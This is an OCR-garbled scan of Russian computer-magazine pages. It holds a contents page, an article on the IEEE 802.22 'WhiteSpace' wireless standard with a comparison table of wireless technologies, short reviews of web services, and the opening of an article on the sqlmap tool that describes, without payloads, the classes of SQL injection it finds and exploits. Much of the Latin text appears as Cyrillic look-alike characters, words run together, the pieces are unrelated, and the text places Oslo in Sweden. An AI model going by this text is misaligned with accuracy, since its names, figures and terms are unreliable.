доступ куправлению целыми ботнетами 
и обезвредить миллионы зараженных 
машин, мы вподробностяхрассказали в 
этом материале. 




РС20ЫЕ 



ВЗЛОМ 







1 




| РЕМБО 





34 


30-СКАНЕРЗА$30 

Ктобы могподумать, чтосимбиозлазер- 


66 


ОБХОД ГРУППОВЫХ ПОЛ итик 

Архитектурные промашки при разработке 


70 




нойуказки и веб-камеры можетпомочь 




ѴѴіпсІоѵѵз оставили немалолазеекдля 





создать ЗБ-модель любого объекта? 
Пробуем простой концептвдействии. 



обхода групповых политик. 8 работающих 
способов — вэтом материале. 



ТЫСЯЧАМ ОДИН инклюд 

Рядовымиуязвимостями класса ІосаІ/ 
гетоЫіІеіпсІисІе мало когоудивишь. Но мы 
и не будем публиковать баян, имея на руках 
несколько совершенно новыхтем. 



МАІ.ѴѴАВЕ 



СЦЕНА 



ІМІХОІО 






БАБЛО НА МАЛ ВАРИ 




НОВАЯ РУБРИКА— ИНТЕРВЬЮ 




82 


Как и сколько зарабатывают наши 
криминальные колеги? Впечатляющие 


94 


Один выпуск — один видный человек из 
ІТ-тусовки. Вэтотраз мы заехали в ЕБЕТ 


118 



откровения участника черного рынка о и взяли интервью у главного вирусного 

том, как было и что стало. аналитика — Александра Матросова. 



АЙОВОЮ: ТОТАЛЬНОЕ ПОДЧИНЕНИЕ 

Рутинг, рекавери, мод, сайаноген... 
Огромное количество различныххаков, 
модов и альтернативных прошивок — 
вэтом большом МедаРАСГе. 
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802 . 22 : 

\ЛМе Брасе 

НОВЫЙ СТАНДАРТ 
БЕСПРОВОДНОЙ СВЯЗИ 



Зачем нужны новые стандарты 
беспроводной связи, когда уже 
есть ѴѴі Рі, ѴѴіМАХ и НЕ? Хотя бы 
длятого, чтобы обеспечитьзону 
покрытия радиусом до 100 км и 
передачуданныхдо22 Мбит/с. 



Официальныйсайт 
802.22: ѵѵѵѵѵѵ.іеее802, 
ога/22 . 



гтш 

Статья основана на 
открытых рабочих 
документахІЕЕЕ 
802.22 ѴѴ6 и обзор- 
нойпубликации 
Сагіоз Согсіеіго, 
Кігап СИаІІараІі 
апсШадпасІіеѵѵ 
Вігги "ІЕЕЕ802.22: 
Апіпігосіисііопіо 
ІИе Рігзі ѴѴігеІезз 
Біапсіагсі Ьазесі оп 
СодпібѵеГСасІіоз". 



I ЕЕЕ 802.22 

В июле2011 г. Международный институтинженеров по электротех- 
нике и электронике (ІпзШ:и1:е о{ Еіесігіса I а псі Еіесігопісз Епдіпеегз] 
объявил о завершении работ над стандартом беспроводной связи ІЕЕЕ 
802.22, известным под именем "ѵѵИі^езрасе" («пробел»]. Название не 
случайно: для передачи данных предполагается использовать «про- 
белы» в телевизионном О ВЧ/УВЧ -диапазоне (54-862 МГц) частот. Этот 
подход стал возможен за счет изобретения «умного» радио — техно- 
логии когнитивной радиопередачи, которая обеспечиваетподстройку 
параметров приемопередающих устройств сети, так чтобы передача 
данных не вылезала на «лицензионные» частоты. Как это происходит? 
Система постоянно анализирует спектр радиосигнала, окружающие 
фоновые сигналы, а также поведение пользователей сети. Базовая 
станция, собрав всю информацию о частотном диапазоне и используя 
информацию о своем месторасположении (по 6РЗ], определяет, какие 
частоты могут быть использованы для установлен ия связи с пользова- 
телями сети. При уже установлен ной связи система периодически ска- 
нирует частотный диапазон на случай появления новых сигналов и при 
обнаружениитаковыхсразуже перестраивается на другие частоты. 
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802.22: ѴѴЫіеЗрасе 



Разработчики отмечают, что ІЕЕЕ 802.22 ѴѴРАЫ является одной из пер- 
вых спецификаций, использующих в полной мере когнитивные техно- 
логи и в ра диосвязи. Та ким образом, стандарт позволяет эффективно 
использовать имеющийся спектр рабочих частот без необходимости 
получения лицензий. В результате это позволяетдостичь скорости 
передачи да иных до 22 Мбит/с и зону покрытия с радиусом до 100 км! 

ИСПОЛЬЗУЕМЫЕ ЧАСТОТЫ 

Новый стандарт бы л спроектирован для беспроводных региональных 
сетей (ѴѴігеІезз РедіопаІ Агеа Ыеііѵѵогк, ѴѴРАМ]. Это предполагаетпо- 
крытиезон радиусом в десятки километров. Спецификация позволит 
провайдерам интернет-услуг обеспечить жителям сельских районов 
доступ к широкопол осному доступу в Сетьтам, где его еще нет. Увеличе- 
ние радиуса действия удал ось достичь благодаря уменьшению рабочих 
частот, обычноиспользуемыхв\А/і-Рі,ѴѴіМахили І_ТЕдля передачи ин- 
формации. Подбор оптимальных частотза висит от многих факторов. Для 
обеспечения наибольшей дальности с сохранением разумной мощности 
и приемлемой полосы пропускания лучшим образом подошли частоты 
диапазона от 54 до 862 МГц, так называемыетелевизионные частоты. 
Ширина полосы одного телевизионного канала в США, Японии и большей 
части Центральной и Южной Америки составляетб МГц, для России и 
большинства других стран эта величина равна 8 МГц, но встречаются та к- 
жестандарты с7-мегагерцовой полосой, напримервАвстралии, Бельгии 
и Люксембурге. Поэтому в 802. 22 предполагается использоватьширину 
полосы одного канала в 6 (8,7) МГц. 

Существующая система телевещания может служить примером 
успешного использован ия этого диапазона для покрытия больших 
площадей. Ктомуже данным частотам нестрашны стены и препятствия. 
Однако в использовании ОВЧ/УВЧ есть и недостаток: меньшие частоты 
(длинные волны] нуждаются в более габаритных антенных системах. 
Кроме повсеместно используемых систем аналогового телевидения 
І\ІТ5С(США, Канада, Япония], РАІ_(Европа], БЕСАМ (Франция, Греция, 
Россия] диапазон официальнозакрепленза радиосвязью государствен- 
ныхслужб(полиции, противопожарной службы ит. д.] и коммерческих 
сервисов (такси ит. д.]. В данной полосе также работают беспроводные 
микрофоны, системы цифровоготелевидения АТ5С/0ѴВ-Т ибогзнаеткто 
еще — важно, что никому из них нельзя мешать! 

ТЕХНОЛОГИЯ «УМНОГО» РАДИО 

Длятого чтобыумело и безобидно использовать «пробелы» вуже 
используемых частотах, предусмотрен целый ряд когнитивных 
механизмов. 

• Сканирование (зепзіпд) рабочего спектра частот позволяет обна- 
руживать занятые каналы. Эта процедура проходит в обязательном 
порядке при инициализации сети. Также информация о частотах 
периодически обновляется при работе системы. Управление 
сканированием осуществляется базовой станцией, которая не 
только посылаетуправляющие команды пользовательскому обо- 
рудованию, но и сама производит разведку спектра ипоискновых 
абонентов. Такая система позволяет актуально поддержать инфор- 
мацию о состоянии эфира во всей зоне покрытия базовой станции и 
своевременно конфигурировать сеть. 

• Регистрация и отслеживание пользовательского оборудования не- 
обходимо для эффективной организации частотного пространства и 
быстрого подключения новых абонентов к сети. 

• Единая база да иных ли цензионных пользователей диапазона изна- 
чально предотвращает работу сети на постоянно занятых местными 
службами или региональнымителевизионными каналами частотах. 

• Геолокация позволяетузнатьрегион размещения и побазеданных 
определить, какие каналы заняты в конкретной местности, а также 
выбрать оптимальный марш рут для передачи пакетов информации. 

В рамках спецификации предполагается применять спутниковое или 
наземное позиционирование. Для спутниковой геолокации у каждого 
абонента будетрасположеноОРЗ-оборудование. Информация о 
местоположении передается на базовую станциюпопротоколу ЫМЕА 
0183. Это текстовый протокол связи морскихнавигационныхсистем, 
повсеместно применяющийся в 6Р5. 



• Механизм совместного сосуществования (соехіэіепсе) систем под- 
разумевает организацию спектра, так чтобы стандарт не вносил по- 
мехи в работу лицензионных пользователей, а также организовывал 
внутрисистемное ранжирование абонентов в рабочей полосе. 

АНТЕННЫ 

Сеть предназначена как для работы с профессиональными фиксиро- 
ванными базовыми станция ми, так и с портативными (либо фиксиро- 
ванными] пользовательски ми терминалами (модемами]. Для охвата 
большихплощадей необходимы соответствующие мощности сигналов. 

В спецификации предполагается, что для покрытия зоны с радиусом в 
30 км потребуется мощность излучения в 4 Вт. На базовой станции для 
этихцелей размещается ненаправленная антенна, чтобы равномерно 
покрытьсигналом всюплощадь. При необходимости изотропнуюантенну 
можнозаменитьсекторной. Такая конфигурация позволитэффективнее 
охватывать зону с неравномерным распредел ением абонентов по площа- 
ди или сосложным размещением несколькихбазовыхстанций. 

На стороне клиента на против применяется узконаправлен ная антен- 
на с ориентированием в сторону базовой станции (или базовой станции с 
максимальным сигналом, если их несколько]. Крометого, в клиентском 
оборудовании имеется сканирующая (зепзіпд) антенна для функциони- 
рования когнитивных механизмов. При использовании спутникового 
позиционированиятакжеможетбытьразмещенабРЗ-антенна. 

Важнопониматьотличиестандарта ІЕЕЕ 802. 22 от других специфика- 
ций, в особенности от ІЕЕЕ 802.16 (ѴѴі Мах], с которым его часто сравнива- 
ют. Основная разница в том, что 802. 22 ориентирован на сельские мест- 
ности и отдаленные регионы. Его радиус зоны покрытия в разы больше. 
Крометого, 802. 22является первым в мирестандартом, использующим 
когнитивные технологии для совместного использования оптимального 
частотногодиапазона и нетребуетоформления лицензий на использова- 
ние определенных частот. 

АРХИТЕКТУРА СТАНДАРТА 

Наиболее важными требованиями со стороны разработчиков к стандарту 
ІЕЕЕ 802.22 были гибкость и адаптивность системы, поскольку оборудо- 
ванию приходится работать в спектре с лицензионными абонентами. В 
итоге стандарт, описывающий РНУ- (РНузісаІ) и М АС-уровни (Месііа Ассезз 
СопШоІ] модели 051 сети, получил особую архитектуру. 

ФИЗИЧЕСКИЙУРОВЕНЬ 

Между базовой станцией и пользовательским оборудованием на 
физическом уровне организована двухсторонняя связь с временным 
разделением (Тіте Оіѵізіоп Оиріехіпд, Юй]. В та ком разделении 



ИСТОРИЯ СТАНДАРТА 

Спецификация 802.22 появилась благодаря работам профессора 
Джозефа Митолы III, опубликовавшего результаты своих исследова- 
ний в 1999 г. совместно с Джеральдом Магуайром. Концепция, назван- 
ная профессором "содпіііѵе гасііо" («когнитивное радио»), позволяет 
системам связи использовать«занятые»частоты для передачи своих 
данных за счет имеющихся в полосе «пробелов». Однако закон запре- 
щал работать с зарезервированными частотными диапазонами, либо 
возможность появлялась при покупке дорогостоящих лицензий. За- 
конодательная база мешала продвижению технологии. Л ишь в 2004 г. 
Федеральное агентство по связи (РебегаІ СоттипісаОопз Соттіззіоп) 
США внесло поправки, дающие возможность нелицензированным 
абонентам использовать лицензионные полосы при условии, что те 
не вносят помех в работу за конных пользователей. Это событие ини- 
циировало появление в ноябре 2004 г. в «стенах» ІЕЕЕ рабочей группы, 
которая стала вести разработку стандарта 802.22 с когнитивной 
радиосвязью в качестве базовой технологии. Окончательный релиз 
ІЕЕЕ 802.22 — 2011 появился л ишь спустя семь лет. 
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802.22: ѴѴЫіе Брасе 



входные и выходные данные передаются на одной частоте, но в разные 
промежутки времени. Если нужноизменитьприоритетпоскорости, 
то нет ничего проще — достаточно продлить выделенное время для 
одного потока данных и сократить для другого. 

Кактранспортный механизм в 802.22 используетсятехнология муль- 
типлексирования с ортогональным частотно-временным разделением 
каналов (СМНодопаІ Ргециепсу Оіѵізіоп МиШрІехіпд, О РОМ]. Аналогичная 
схема применяется вѴѴіМах. Сутьеезаключается втом, что некоторый по- 
токданныхразделяется между несколькими специальными частотами. 
Каждый подпоток модулируется по своей схеме. 

В спецификации предусмотрен о три вида схем модуляции: ква- 
дратурная фазовая манипуляция ЮиасІ гадите РНазеБЫЛ: Кеу, 0Р5К), 
квадратурная амплитудная манипуляция порядка 16 и 64 (ОиасІ гаіи ге 
Атріііисіе Мобиіаііоп, 160АМ и 64 (ЗАМ). Схемы отличаются междусо- 
бой количеством информации, которую можно передать одним симво- 
лом. Та или иная схема модуляции выбирается исходя изусловий пере- 
дачи. Чем выше скорость передачи, тем ниже ее надежность (тем выше 
вероятность возни кн овен ия ошибки). Поэтому если абонент сети рас- 
положен далеко от базовой станции и уровень сигнала во время связи 
не очень высок, то лучше сменить схему модуляции, напримерсІбОАМ 
на более медленную, но зато стабильную (ЗР5К. Система постоянно 
адаптируется, и для каждого пользователя проводится балансировка 
оптимального режима между скоростью и помехоустойчивостью. 

Важным для стандарта является особенность О РОМ противостоять 
многолучевому распространению. Данный эффект возни кает при на- 
личии каких-либо препятствий между базовой станцией и абонентом. 
Сигнал можетиспытатьмногоотражений отразнообразныхобъектов. 

В конечном счете к прием ному устройству приходит не один сигнал, а 
несколько с некоторой задержкой, что может при вести к межсимвольной 
интерференции. Против этого в ОРБМ применяют специальную вставку, 
такназываемый циклический префикс. 

Для более стабильной работы в 802.22 предусмотрено исполь- 
зование кодов, позволяющих корректировать ошибки. Втом числе 
коды Галлагера (баііадег), которые на данный моментпредставляют 
лучшее решение для передачи информации по каналу связи с шумами 
в ограниченной полосе. 

Для организации доступа кканалусвязи несколькихабонентов 
одновременно применяется техника частотно-временного разделения 
(Ог1:ЬодопаІ Ргециепсу Оіѵізіоп МиШрІеАссезз, О РОМА). Это уникальная 
технология, позволяющая использовать доступное частотное простран- 
ство максимально вы годным способом. ОРОМАуже отлично себя за- 
рекомендовала втакихстандартах, какѴѴіМахи НЕ. В механизмеОРйМ 
доступные специальные частоты делятся между пользователями сети. 

Спектральная эффективность по стандарту может варьировать- 
ся от 0,624 до 3,1 2 Бит/с/Гц. Эта величина характеризует скорость 
передачи данных в за да нн ой полосе частот. Чем выше значение, 
тем большей пропускной способностью обладает система, однако с 
ростом спектральной эффективности уменьшается помехозащищен- 
ность. Для компенсации низкой пропускной способности канала при 
минимальной спектральной эффективности используется методика 
канального объединения (сИаппеІ Ьопсііпд]. Суть методики заключа- 
ется в использовании до трех телевизионных каналов одновременно, 
чтобы за счет ширины полосы в 18(21,24] МГц обеспечить приемлемую 
скорость передачи. 

Для защиты лицензионных каналов необходимо выдерживать 
частотный интервал, чтобы исключить возникновение помех. Ширину 
частотного интервала рекомендуют делать сопоставимой с шириной 
одного канала. Фактически необходимо иметь в ОВЧ/УВЧ -диапазоне 
пробелы шириной оттрех каналов (один информационный плюс два 
защитных по бокам] и более. Это требование еще раз подчеркивает, 
что целесообразно разворачивать I ЕЕ Е 802.22 в сельской и малонасе- 
ленной местности, где эфир относительно свободен. 

МАС-УРОВЕНЬ 

Уровень управления доступом к среде (Месііа Ассезз Сопігоі] орга- 
низуетадресацию и контрольдоступа ксети. МАС, основанный на 
когнитивныхтехнологиях, должен иметьоченьдинамичную и гибкую 



архитектуру, чтобы оперативно реагировать на изменения в сети. 

Для обмена данными в 802.22 используются суперфреймы 
(зирег^га те]. Длительность одного суперфрейма составляет 160 мс. 

В начале каждого суперфрейма расположена специальная преам- 
була (ргеатЫе) и контрольный заголовок суперфрейма (зи ренегате 
сопітоі И еа бег, далее — 5СН]. По каждому из доступных и отвечающих 
всем требованиям каналов базовая станция посылает суперфреймы. 
Абоненты, находящиеся в зоне действия станции и еще не подклю- 
ченные ксети, «слушают» свободные каналы на наличие суперф- 
реймов. Получив данные, абонентское оборудование извлекает из 
5СН всю необходимую информацию для инициализации сетевого 
соединения. Каждый суперфрейм состоит из фреймов (^га те). Дли- 
тельность одного фрейма составляет 10 мс, соответственно в одном 
суперфрейме 16 фреймов. Фреймы являются непосредственными 
переносчиками данных. 

Инициализация сети в 802.22 сложнее, чем в других беспроводных 
сетях. Всё усложняется тем, что нет изначально определенного канала 
связи. Таким образом, пользовательскому оборудованию сначала 
необходимо просканировать сетку частот и составить карту всего 
диапазона. Затем в свободных и подходящих пробелах искать ЗСН 
базовой станции. После того как ЗСН будет получен, модем абонен- 
та дает о себе знать базовой станции и остается в канале на время 
действия суперфрейма. Если за это время модем получает ответ, то 
происходит инициализация и подключение ксети. После установле- 
ния соединения информация о состоянии каналов отправляется на 
базовую станцию. 

Как говорилось выше, во время работы в сети базовая станция 
периодически посылает команды абонентскому оборудованию для 
запуска сканирования диапазона на наличие лицензионных пользо- 
вателей. При этом существу ют различные алгоритмы сканирования, 
которые определяют пороговый уровень си гнал а в канале, время 
сканирования, диапазон, вероятность обнаружения ложной тревоги. 
Существуют определенные пороговые значения сигналов, при кото- 
рых они будут интерпретироваться как лицензионные пользователи. 
Всеэти параметры влияютна успешность получения достоверной 
частотной сетки в регионе. Базовая станция можетраспределять на- 
грузку между абонента ми при сканировании частотного спектра. 

Если основная базовая станция долго «молчит», то тогда абонент- 
ское оборудование ищет маяки от другой соседней станции и в случае 
успешного поиска подключается к ней. Моделирование сети показа- 
ло, что даже при большом скоплении рядом расположенных станций 
терминалы абонентов быстро распределяются между ними. В резуль- 
тате нагрузка на базовые станции становится оптимальной. 



ГЛАВНОЕ О СТАНДАРТЕ 

• Назначение: широкополосный беспроводной доступ кинтернету 
для сельской местности. 

• Ядроітехнология когнитивной радиопередачи, предназначенная для 
безлицензионного использования частоттелевизионного диапазона. 

• Портативность: можно использовать в движении на скорости до 
114 км/ч. 

• Топология сети: многоточечная (РоіпМо-МиШроіп*). 

• Радиусзоны покрытия: 10-100 км (для фиксированной базовой 
станции и модема). 

• Мощность излучения: 4 Вт (под мощностью излучения понимается 
эффективная изотропно излучаемая мощность, ЕІРР). 

• Антенны: на базовой станции используется ненаправленная (либо 
секторная) приемопередающая антенна, а на стороне абонента 
направленная антенна; помимо этого, есть ненаправленная антенна 
для сканирования частотного диапазона (когнитивная радиосвязь]. 

• Геопозиционирование: 6Р5 или наземное (необходимо для функ- 
ционирования системы]. 
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РС20ЫЕ 



ѴѴі-Рі 


ІІМТ5 1365М) 


ѴѴіМах 


НЕ 


802.22 


Стандарт 


802.1 1 д 


802.1 1 п 


ЦМТ5/ѴѴ-С0МА 


802.16с! 


НЕ 


802.22 


Описание 


ѴѴі-Рі предназначен для замены 
проводных локальных сетей. По- 
следние стандарты по скорости 
ничуть не уступают кабельным 
аналогам. В семействе 802.1 1 
более двух десятков специфика- 
ций. ѴѴі-Рі расшифровывается как 
ѴѴігеІезз Рісіеіііу («Беспроводная 
точность»). 


Технология сотовой 
связи, которую относят 
к поколению 36. ІІМТ5 
расшифровывается как 
ІІпіѵегБаІ МоЬіІе Теіесот- 
типісабоп Бузіет. 


Технология широкопо- 
лосной связи, которую от- 
носят к сетям 3.96. ѴѴіМах 
является динамично раз- 
вивающейся во всем мире 
технологией. Аббревиатура 
расшифровывается как 
ѴѴогІбѵѵісІе ІпІегорегаЬіІіІу 
(о г Місгоѵѵаѵе Ассезз 
(«Международное взаимо- 
действие для микроволно- 
вого доступа»). 


Технология является 
развитием линейки 
СОМА-ІІМБТ-стандартов. 
Последовательность в 
развитии позволяет тех- 
нологии легко адаптиро- 
ваться на существующих 
ІІМТБ-сетях. НЕ относят 
к сетям 3.96-поколения. 
НЕ — І_опд Тіте 
Еѵоіиііоп («Долговремен- 
ное развитие»). 


802.22 являет- 
ся беспроводной 
технологией, которая 
предназначена для 
организации широко- 
полосного доступа к 
интернету в малона- 
селенной местности 
и сельских районах. 
Базовые станции 
способны покрывать 
большие площади с 
использованием ког- 
нитивных технологий. 


Применение 


Сейчас ѴѴі-Рі-устройства встроены 
во многие мобильные компьютеры. 
Стандарт стал лидером де- 
факто в передаче данных между 
переносными устройствами и для 
выхода в интернет. В результате 
точки доступа в огромном 
количестве покрывают районы 
крупных городов мира. 


ІІМТ5 является самой 
популярной технологией 
мобильных 36-сетей. 
Существуют дополни- 
тельные надстройки над 
ІІМТ5, позволяющие уве- 
личить скорость обмена 
данными: Н5РА, Н5РА+, 
НБйРА. Такие сети отно- 
сят к 3.56-поколению. 


ѴѴіМах можно назвать 
аналогом ѴѴі-Рі, но в 
масштабах города (ѴѴМАІМ). 
Стандарт способен вы- 
ступать как альтернатива 
05І_-соединению. На базе 
спецификации реализуют- 
ся системы, соединяющие 
локальные сети, например 
на основе ѴѴі-Рі. 


Сети НЕ активно разви- 
ваются. Успешный проект 
реализован в Осло (Шве- 
ция). Крупнейшие сото- 
вые операторы совместно 
со «С карте л» (Ѵоіа) в 
ближайшем времени 
планируют развернуть по 
всей России сеть НЕ на 
замену ныне существую- 
щим технологиям. 


Спецификация появи- 
лась недавно, поэтому 
на данный момент нет 
развернутых сетей. 


Мобильность 


Нет 


Нет 


Да 


Нет (но существуют 
мобильные спецификации) 


Да 


Нет 


Дальность 


38-140 м 70-250 м 


5 км 


4-6 км 


5-100 км 


30-100 км 


іПІІтта.ітэАм-чі-Л-^і'' мшш] НЕН 

!_'.0 41 


-1 7 - 


■ - 


















Частоты 


2,4 ГГц 


2,4 и 5 ГГц 


1885-2025 МГц 
2110-2200 МГц 


2-1 1 ГГц 


700-4000 МГц 


54-862 МГц 


Максимальная 

скорость 

передачи данных 


54 Мбит/с 


600 Мбит/с 


2 Мбит/с 


75 Мбит/с 


173 Мбит/с 


23 Мбит/с 


Ширина канала 


20 МГц 


20-40 МГц 


5 МГц 


1,25-20 МГц 


1,4-20 МГц 


6-24 МГц 


Дуплекс 


ТОО 


Юй 


РОй 


рор/тор 


РРР/ТРР 


ТОО 


Доступ 


С5МА/СА 


ОРйМА 


ѴѴ-СйМА 


ОРйМА 


0РРМА/5С-РРМА 


ОРБМА 


МІМО 


Да 


Да 


Нет 


Да 


Да 


Да 


Год выпуска 


2003 


2009 


2001 


2004 


2009 


2011 



БЫТЬ ИЛЬ НЕ БЫТЬ? 

ІЕЕЕ 802.22, появившийся сравнительно недавно, принес с собой 
новые механизмы, которые могут позволить донести качественную 
связь даже в самые отдаленные уголки планеты. Уникальный под- 
ход к решению вопроса о делении частотного диапазона, который в 
России стоит остро, может сделать 802.22 самым распространенным 
стандартом беспроводной связи для покрытия больших площадей. 
Для этого применяются рассмотренные в статье частное сканирова- 
ние рабочего диапазона, постоянный мониторинг и отслеживание 



изменений, а также процедура совместного использования спектра 
с лицензионными пользователями. Какзнать, возможно, именноэто 
решение позволит покрыть необъятные просторы нашей родины 
качественным интернетом. Даже если стандарт не пол учит должной 
поддержки, то в любом случае с его выходом появился новый под- 
ход, когда разные устройства разных стандартов не функционируют 
обособленно, а взаимодействуют между собой и организовывают 
окружающее пространство для выгодного совместного использова- 
ния. И это своего рода прорыв. ~в~ 
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Полную версию таблицы ищи на нашем диске 








ѴѴѴѴѴѴ2 



ЕНСІРНЕЙЛ 

■ ' I 1 Тл I , 1 ■шг^.п. Л ^1.1*2 .1 .И| ІЛ 1^ ч'і. ■ 

1 А :.І?Д ІІІ>'>І ■.Ѵ.ІІРІ 




Для шифрования сообщений в любых сервисах 



ЕЫСІРНЕР.ІТ 

епсфпеГі^ ^^^^^ 

Название этого сервиса (а вернее, даже доменного имени] говорит само за себя: он по- 
зволяет шифровать сообщения в любом сервисе: бтаіі, РасеЬоок и любом другом. Как это 
работает? На панельзакладокдобавляется специальный букмарк, который вызывает 
простенькую функцию на ЭаѵаЗсгірІ, которая криптует выбранный текст с помощью АЕ5 256. 
Перед шифрованием у пользователя запрашивается парольная фраза, которая далее будет 
использоваться для расшифровки. Получается гениально удобная система, если нужно 
за шифровать текст, например, в письме бтаіі. Просто выбираем тело сообщения, нажима- 
ем на букмарк — и текст автоматически меняется на зашифрованный. Если же тебе самому 
пришла за криптованная месса га, то опять же просто вызываем букмарк, вводим пароль — и 
получаем текст в открытом виде. 



ВТ0І66 

Есть немало сервисов-агрегаторов, которые и ндексируютторренты с самых разных трекеров и 
предоставляютудобный поискпо ним. ВЮіддтоже позволяетнайти нужный файл в ВііТоггепІ- 
сети, но использует в корне другой подход. Это поисковик по ОНТ-сети! Напомню, что последняя 
позволяет организовывать раздачи в ВіСГогегепІ-сети без трекера вовсе. По сути, это распреде- 
ленная сетьторрент-клиентов, которая хранит идентификаторы (хеши) всех публичных раздач 
— т. н. тадпеіі-линков, представляющихсобой 160-битноеслучайноечисло. ВЮідд ежедневно 
индексирует 0 НТ-сеть и позволяет проводить поиск по мета- информации, содержащейся в 
любомторррент-файле. Можно даже использовать ключевые слова для поиска: йпагпе (поиск 
по имени фа йла), (скопІепНпоиск по содержанию). 

Для запуска кода на разных языках прямо в браузере 



ВТЪІбв™ 






Поискторренюв по РНТ сети 



ЮЕОЫЕ 

шеопе!сопі 

Раз столкнувшись с необходимостью скомпилировать в би на рн и к простенький код, 
я надолгозапомнил проектібеопе, который менятогда выручил. По сути, это онлайн- 
компилятор и отладчик для более чем 40 языков программирования. Другими словами, 
можно набросать код и запуститьего прямо в браузере. Поддерживаются С/С++, Эаѵа, С#, 
АззетЫег, ОЬіесІіѵеС, все скриптовые языки (втом числе Ру^Ноп] и даже ассемблер. Важно 
только уложиться в ограничения: Юсекундна компиляцию, 15 секунд (если незарегистри- 
роваться, то только 5) на выполнение, 256 Мб памяти. Помимо этого, программа не сможет 
обращаться в Сеть и работать с файлами. Проект предоставляет также АРІ, которые активно 
используют сейчас приложения для разных мобильных платформ. 



ТА6ВЕЕР 

[аареерТсоп^ ^ 

Наконец-тоя нашел ту системудля мониторинга хостов, которая меня полностьюустраива- 
ет. Я говорю о бесплатном сервисе Іад Веер. Суть сервиса понятная — проверять ра ботоспо- 
собность веб-серверов и у ведом л ять о наличии проблем. Тад Веер построен предельно про- 
сто, но при этом позволяет задать тон кие параметры для процедуры проверки. Например, 
можно детальноуказать, какой именно ответдолжен отдавать сервер, а какой — не должен. 
Или, к примеру, задать временной лимит на загрузку страницы (скажем, 10 секунд). Тад Веер 
умеет визуализировать время отклика в виде красивых графиков, сохраняет скриншоты 
своих роботов (в любой момент можно посмотреть, как выглядел сайт). А 5М 5-оповещения, 
та услуга, за которую все обязательно берут денежки, здесь пока бесплатна. 



іаевеер"" — 




Суперпростой иудобный мониторингхостов 
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РС20ЫЕ 



5а I та р, и л и 

5йі_- инъекции 
это просто 



ОДНА ИЗ ЛУЧШИХ 
УТИЛИТ ДЛЯ ПОИСКА 
И ЭКСПЛУАТАЦИИ 
501-УЯЗВИМОСТЕЙ 



ІШП 

Разработкой сканера занимаются два человека. Мирослав Штампар 
(ІЗзІатрагт), профессиональный разработчиксофта изХорватии, и Бернар- 
до Дамеле ((ЗіпчиізЬ), консультантпо ИБ из Италии, сейчас проживающий и 
работающий в Великобритании. Проект появился на светв 2006 г. благодаря 
Даниэлю Беллучи (ГСЬеІсМ, но по-настоящемустремительностал развивать- 
ся после того, как в 2009 г. в работу включились Мирослав и Бернардо. 






ГиГТШ СШкфййН 1 


/.іи іій^іимг уш іил АіАХВиі» 


мігЫі ягі 


ГагіМ: Б.а.Н-ІкЪТап_аиЪип1ѣіБ.йе.В-| 


Г ЭРеЦ 


1 іоа;лаіагШІосаІЬой: эсдіагі 1 


ЙгтМ*Ш 

Ѵоцг гдаі 


ѵ*# рейт -ЭТИ 


Уош ргеЫа 




ОгГртѴЦКНЧ 
АіАХ Йили 

!№■ 

ридщІЁідаліг 

ШѴІ 


«іФгіѴі 

Т 





КАКИЕ УЯЗВИМОСТИ 




МОЖЕТ НАХОДИТЬ 50І_МАР? 



ІІІМІОМ ^иегу5^^іп^ес^іоп 



и 



так, что такое зрі тар? Одна из мощнейших открытых утилит 
для пентестера, которая автоматизирует процесс поиска и 
эксплуатации 5(ЭІ_-инъекций с целью извлечения данных или 
захватаудаленного хоста. Чтоделаетзрітаротличным отдругихутилит 
для обнаружения5СІІ_-инъекций,такэто возможность эксплуатировать 
каждую найденную уязвимость. Это означает, что зрітар способен не 
только находить «дырку», но еще и заюзать ее по полной программе. А 
коль уж в качестве задачи ставится именно эксплуатация уязвимости, 
то скан еру приходится быть особенно внимательным к деталям: он не 
будет выдавать миллион ложных срабатываний «так, на всякий случай» 
(какэтомы видим во многихдругих приложениях]. Любая потенциаль- 
ная уязвимость дополнительно проверяется на возможность эксплуа- 
тации. Сканер из коробки идете огромным функционалом, начиная от 
возможности определения системы управления базой да иных (далее 
0ВМ5], создания дампа (копии) да иных и заканчивая получением до- 
ступа к системе с возможностью обращаться к произвольным файлам 
нахосте и выполнятьна сервере произвольные команды. И все-таки 
главное — это обнаружение возможности сделать инъекцию 50 Ь-кода. 



Есть пять основных классов 50 1_- инъекций, и все их поддерживает 

зріппар: 

• ІШІОЫ циегу5СІІ_іпіесІіоп. Классический вариант внедрения 
50І_-кода, когда вуязвимый параметр передается выражение, 
начинающееся с «II N10 N АН 5ЕСЕСТ». Эта техника работает, 
когда веб-приложения напрямую возвращаютрезультатвывода 
команды 5ЕІ.ЕСТ на страницу: с использованием цикла {ог или по- 
хожим способом, так что каждая запись полученной из БД выборки 
последовательно выводится на страницу. Бріпгіар может также экс- 
плуатировать ситуацию, когда возвращаетсятолько перваязапись 
из выборки (Ра гііаі I) N 1 0 N риегу 50І_ іщес^іоп]. 

• Еггог-ЬазесІ5СІІ_іпіесІіоп. В случаеэтой атаки сканерзаменяет 
или добавляет в уязвимый параметр синтаксически неправильное 
выражение, после чего па рент НИР- ответ (за головки и тело] в по- 
иске ошибокйВМ 5, в которых содержалась бы заранее известная 
инъецированная последовательностьсимволов и где-то «рядом» 
вывод на интересующий нас подзапрос. Эта техника работаеттоль- 
ко тогда, когда веб-приложение по каким-то причинам (чаще всего 
в целях отладки] раскрывает ошибки 0ВМ5. 

• 5іаскес1циегіе55СІІ_іпіесІіоп. Сканер проверяет, поддерживаетли 
веб-приложение последовательныезапросы, и, если они выполняют- 
ся, добавляетвуязвимый параметрНТТР-запросаточкусзапятой (;) и 
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Зціппар, или ЗОБ- инъекции — это просто 




ВооІеап-ЬавесІЫіпгіБОЫпіесІіоп 



следом внедряемый 5(ЗБ-зап рос. Этот прием в основном используется 
для внедрения ЗСІІ_-команд, отличных от5ЕІ_ЕСТ, напримердля мани- 
пуляции данными (с помощью ІЫЗЕРТ или ОЕБЕТЕ). Примечательно, 
что техника потенциально можетпривести квозможности чтения/ 
записи из файловой системы, а также выполнению команд в ОС. 
Правда, в зависимости от используемой в качестве бэк-энда системы 
управления база ми данных, а также пользовательских привилегий. 

• Вооіеап-Ьазесі ЫіпсІБСіипіесІіоп. Реализациятакназываемой 
слепой инъекции: данные из БД в «чистом» виде уязвимым веб- 
приложением нигде не возвращаются. Приемтакже называется 
дедуктивным. Здітар добавляет в уязвимый параметр НИР- 
запроса синтаксически правильно составленное выражение, 
содержащее подзапрос ЗЕБЕСТ (или любую другую команду для 
получения выборки из базы данных). Для каждого полученного 
НТТР-ответа выполняется сравнение Иеасіегз/Ьосіу страницы 
сответом на изначальный запрос — таким образом, утилита 
